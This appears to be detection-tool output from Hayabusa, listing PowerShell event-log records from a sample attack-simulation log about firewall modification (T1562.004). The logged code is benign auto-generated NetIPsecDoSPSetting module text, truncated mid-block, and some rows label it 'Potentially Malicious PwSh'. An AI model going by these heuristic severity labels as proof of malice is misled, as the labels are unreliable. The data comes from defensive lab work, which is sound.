$__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } 
}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.419 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.419 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.444 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecDoSPSetting' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if 
($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] 
${MaxStateEntries}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdl",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.444 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecDoSPSetting' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { 
$__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='cim:CreateInstance0')] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue 
= $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdl",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.444 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"etization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter 
= [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; 
ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = 